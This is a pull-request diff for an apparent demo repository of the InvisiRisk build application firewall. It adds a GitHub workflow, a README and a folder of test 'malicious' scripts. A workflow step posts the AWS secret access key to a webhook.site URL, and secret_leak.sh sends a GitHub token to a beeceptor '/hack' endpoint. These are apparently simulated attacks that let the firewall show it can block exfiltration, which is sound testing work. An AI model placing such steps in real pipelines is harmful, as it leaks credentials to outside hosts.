parasole1 · ir-paras-oli · Jan 24, 2025 · Jan 24, 2025 · Jan 24, 2025 · Jan 27, 2025
diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
@@ -0,0 +1,43 @@
+name: JavaScript Project
+
+on:
+  workflow_dispatch:
+
+permissions:
+  checks: write
+  contents: write
+  packages: read
+
+jobs:
+  python-application-build:
+    runs-on: ubuntu-latest
+    name: Run build
+    steps:
+      - name: Setup PSE
+        uses: invisirisk/pse-action@dev-test
+        with:
+          api_url: "https://app.stage.invisirisk.com"
+          app_token: ${{ secrets.IR_API_KEY }}
+
+      - name: Use npm
+        uses: actions/setup-node@v4
+        with:
+          node-version: "18"
+
+      - name: Install dependencies
+        run: npm install --legacy-peer-deps
+
+      #- name: 😈 Execute malicious script
+       # run: bash run_malicious_scripts.sh
+
+      - name: Send AWS Secret via Webhook (test)
+        run: |
+         curl -X POST "https://webhook.site/59c8292c-2297-4149-ac29-c02bec44a27a" \
+           --data-urlencode "aws_secret_access_key=${{ secrets.AWS_SECRET_ACCESS_KEY }}"
+
+
+      - name: Cleanup PSE
+        if: always()
+        uses: invisirisk/pse-action@dev-test
+        with:
+          cleanup: "true"
diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml
diff --git a/Malicious_scripts/mimetype.sh b/Malicious_scripts/mimetype.sh
@@ -0,0 +1,3 @@
+#!/bin/bash
+
+curl -H "Accept: text/html" -o google.html "https://www.google.com"
diff --git a/Malicious_scripts/push.sh b/Malicious_scripts/push.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+
+echo "Marking repository as safe..."
+git config --global --add safe.directory "$GITHUB_WORKSPACE"
+
+echo "Setting up Git user..."
+git config user.name "ir-paras-oli"
+git config user.email "paras.oli@invisirisk.com"
+
+echo "Making changes (creating a file)..."
+echo "Some new content" > new6-file.txt
+git add new6-file.txt
+git commit -m "Add a new file"
+
+echo "Pushing changes to the STAGE branch..."
+git remote set-url origin https://x-access-token:${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }}.git
+git push origin STAGE
diff --git a/Malicious_scripts/run_wrapper.sh b/Malicious_scripts/run_wrapper.sh
@@ -0,0 +1,8 @@
+#!/bin/bash
+
+echo "Starting leak_token.sh execution..."
+bash ./secret_leak.sh  # Call the actual script
+bash ./statuscode.sh # Call the actual script
+bash ./push.sh  # Call the actual script
+bash ./mimetype.sh  # Call the actual script
+echo "Execution completed."
diff --git a/Malicious_scripts/secret_leak.sh b/Malicious_scripts/secret_leak.sh
@@ -0,0 +1,8 @@
+#!/bin/bash
+
+# Sending a POST request with a GitHub token (LEAK)
+curl -k -X POST https://vbirmock.free.beeceptor.com/hack \
+  -H "Content-Type: application/json" \
+  -d '{
+    "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"
+  }'
diff --git a/Malicious_scripts/statuscode.sh b/Malicious_scripts/statuscode.sh
@@ -0,0 +1,11 @@
+#!/bin/bash
+
+echo "Checking status code from GitHub API..."
+
+# This request should trigger a 400 Bad Request because 'q' is empty
+curl -k -i -X GET "https://api.github.com/search/repositories?q="
+
+# This request should trigger a 401 Unauthorized if authentication is required but not provided
+# curl -k -i -X GET "https://api.github.com/user"
+
+echo "Status check completed."
diff --git a/README.md b/README.md
@@ -1,2 +1,55 @@
-readme
-readme
+# InvisiRisk Build Application Firewall Demo
+
+This repository contains a JavaScript application that demonstrates how InvisiRisk build application firewall works. The project serves as a boilerplate example to showcase the security features and implementation of InvisiRisk in a JavaScript environment.
+
+## GitHub Workflow Setup
+
+To integrate InvisiRisk into your GitHub workflow, add the following steps to each job in your workflow file:
+
+### 1. Add the Setup PSE step at the beginning of each job:
+
+```yaml
+- name: Setup PSE
+  uses: invisirisk/pse-action@v1.0.20
+  with:
+    api_url: "https://app.invisirisk.com"
+    app_token: ${{ secrets.IR_API_KEY }}
+```
+
+### 2. Add the Cleanup PSE step at the end of each job:
+
+```yaml
+- name: Cleanup PSE
+  if: always()
+  uses: invisirisk/pse-action@v1.0.20
+  with:
+    cleanup: "true"
+```
+
+### 3. Set up the required secret:
+
+You need to set the IR_API_KEY secret in your GitHub repository settings. This API key can be obtained from the InvisiRisk portal.
+
+### Example workflow:
+
+```yaml
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+
+      - name: Setup PSE
+        uses: invisirisk/pse-action@v1.0.20
+        with:
+          api_url: "https://app.invisirisk.com"
+          app_token: ${{ secrets.IR_API_KEY }}
+
+      # Your other build steps here
+
+      - name: Cleanup PSE
+        if: always()
+        uses: invisirisk/pse-action@v1.0.20
+        with:
+          cleanup: "true"
+```
diff --git a/mern-social-second-edition/README.md b/mern-social-second-edition/README.md
diff --git a/mern-social-second-edition/package.json b/mern-social-second-edition/package.json
Original file line number	Diff line number	Diff line change
		@@ -0,0 +1,3 @@
		#!/bin/bash

		curl -H "Accept: text/html" -o google.html "https://www.google.com"